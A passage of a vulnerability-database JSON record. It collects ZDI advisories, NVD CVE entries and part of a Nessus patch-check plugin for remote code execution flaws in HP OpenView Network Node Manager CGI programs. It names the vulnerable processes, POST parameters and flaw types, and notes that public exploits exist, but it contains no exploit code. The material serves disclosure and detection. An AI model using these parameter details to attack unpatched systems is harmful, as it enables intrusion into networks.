http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the ovet_demandpoll.exe process. This\r\nprocess can be started by invoking the webappmon.exe CGI application\r\nthrough the webserver. The process calls vnsprintf() directly with the\r\ncontents of the 'sel' POST variable. By providing a malicious value this\r\nformat string vulnerability can be leveraged by remote attackers to\r\nexecute arbitrary code under the context of the ovet_demandpoll.exe\r\nprocess.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23819", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23819", "title": "ZDI-10-081: HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1552"], "description": "ZDI-10-083: HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-083\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1552\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9268. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the snmpviewer.exe CGI. The doLoad\r\nfunction in this process calls sprintf() with a %s format specifier and\r\nunsanitized user input retrieved from two separate POST variables (act\r\nand app). By providing large enough strings a remote attacker can cause\r\na stack-based buffer overflow and eventually execute arbitrary code\r\nunder the context of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2010-02-11 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23820", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23820", "title": "ZDI-10-083: HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1551"], "description": "ZDI-10-082: HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-082\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1551\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9271. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the Network Monitor (netmon.exe) daemon.\r\nThis process can be started by invoking the webappmon.exe CGI\r\napplication through the webserver. When the _OVParseLLA function defined\r\nwithin ov.dll is called from netmon.exe it directly copies the value of\r\nthe 'sel' POST variable into a fixed-length stack buffer with a call to\r\nstrcpy(). This can be leveraged by remote attackers to execute arbitrary\r\ncode under the context of the webserver process.\r\n\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23818", "title": "ZDI-10-082: HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in getnnmdata.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via an invalid iCount parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1554", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1554"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1554", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in getnnmdata.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via an invalid MaxAge parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1553", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1553"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1553", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Format string vulnerability in ovet_demandpoll.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via format string specifiers in the sel parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1550", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1550"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1550", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in the doLoad function in snmpviewer.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via the act and app parameters.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1552", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1552"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1552", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in the _OVParseLLA function in ov.dll in netmon.exe in Network Monitor in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via the sel parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1551", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1551"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1551", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.", "edition": 24, "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2010-05-17T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40707.NASL", "href": "https://www.tenable.com/plugins/nessus/46347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40707. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46347);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40707 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_40707 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40707\", \"PHSS_41242\", \"PHSS_41606\", \"PHSS_41857\", \"PHSS_42232\", \"PHSS_43046\", \"PHSS_43353\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", 